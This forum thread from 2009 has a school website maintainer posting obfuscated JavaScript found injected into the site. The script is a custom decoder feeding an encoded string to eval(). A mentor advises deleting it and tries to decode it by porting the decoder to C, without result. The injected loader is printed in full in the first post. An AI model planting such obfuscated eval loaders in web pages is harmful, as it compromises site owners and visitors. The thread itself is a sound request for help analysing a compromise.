1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help me figure this out please!!

Discussion in 'JavaScript and AJAX' started by ed5480, Mar 11, 2009.

  1. ed5480

    ed5480 New Member

    Joined:
    Mar 11, 2009
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    I found this on my website and i dont know what it does or how it got there. If anyone can help me try and figure this thing out please let me know.
    Code:
    <script language=JavaScript>
    
    function rmban(x)
    {var l=x.length,
    b=1024,
    i,j,r,
    p=0,s=0,w=0,
    t=Array& #40;63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5
     6,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,26,41,33,20,
    12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61);
    
    for(j=Math.ceil(l/b);j>0;j--)
    {r='';
    for(i=Math.min(l,b);i>0;i--,l--)
    {{w|=(t[x.charCodeAt(p++)-48])<<s;
    if(s){r+=String.fromCharCode(149^w&255);
    w>>=8;s-=2}
    else{s=6}
    }
    }
    eval(r);
    }
    }
    rmban(& #39;yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkU
     TYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJ
     cw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0r
    GGq')
    </script>
    <!-- 205.178.132.155 -->
     
  2. xpi0t0s

    xpi0t0s Mentor

    Joined:
    Aug 6, 2004
    Messages:
    3,012
    Likes Received:
    203
    Trophy Points:
    0
    Occupation:
    Senior Support Engineer
    Location:
    England
    Well it could do absolutely anything. It's clear it's been severely obfuscated.
    So if you delete it on the grounds that it must have been obfuscated for a reason, and that probably wasn't a good reason since whoever put it there did so without your knowledge, I would suggest just deleting it. If it reappears raise it with your ISP, maybe it's some advertising junk, especially if you've got a "free" (i.e. advert supported) hosting provider. Or maybe there's some lack of security on their part that they would want to know about, since it appears people can add what looks like potentially malicious code to any of their customers' websites.

    "potentially malicious" because it's obfuscated and uncommented. If it were there for valid reasons it wouldn't be at least one of those.
     
  3. ed5480

    ed5480 New Member

    Joined:
    Mar 11, 2009
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    the website belongs to my high school. its our schools website and no one on the team that works on it knows javascript. the site is not hosted on a free server or anything like that. we want to know what it does. based on the research ive done it seems like it may be encoding or decoding a php string to run on our server but we could be completely wrong. If anyone knows what this does PLEASE let us know. It has been removed from the site but we would like to figure out what it does and hopefully that will help us figure out where it came from and possibly why its there. Thanks
     
  4. xpi0t0s

    xpi0t0s Mentor

    Joined:
    Aug 6, 2004
    Messages:
    3,012
    Likes Received:
    203
    Trophy Points:
    0
    Occupation:
    Senior Support Engineer
    Location:
    England
    I can't figure out what it does. I've converted it to C and I think I've got it right but it just produces junk. There could be some nuance of Javascript I'm not aware of that means I've got the conversion wrong, which isn't unlikely as I'm not a Javascript expert, but I've tried a few things and nothing produces anything that looks meaningful.
    Note that the Go4Expert parser will most likely add spaces to the long strings, as I think it has done with your original post. In this there are no spaces in x or t.
    Also I've tweaked some of the code based on the actual length of x, e.g. as it's less than b, ceil(l/b) will be 1.
    Code:
    	char *x="yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkUTYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJcw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0rGGq";
    	int t[]={63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5,6,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,26,41,33,20,12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61};
    	int l=(int)strlen(x);
    	int b=1024,i,j;
    	int w=0,s=0,p=0;
    	for (j=1/*ceil(l/b)*/; j>0; j--)
    	{
    		char r[1024];
    		int rptr=0;
    		r[rptr]=0;
    		for (i=l; i>0; i--)
    		{
    			w|=(t[(x[p++]-48)])<<s;
    			if(s)
    			{
    				r[rptr++]=char(149^w&255);
    				r[rptr]=0;
    				w>>=8;
    				s-=2;
    			}
    			else{s=6;}
    		}
    		printf("eval('%s')\n",r);
    	}
    
     

Share This Page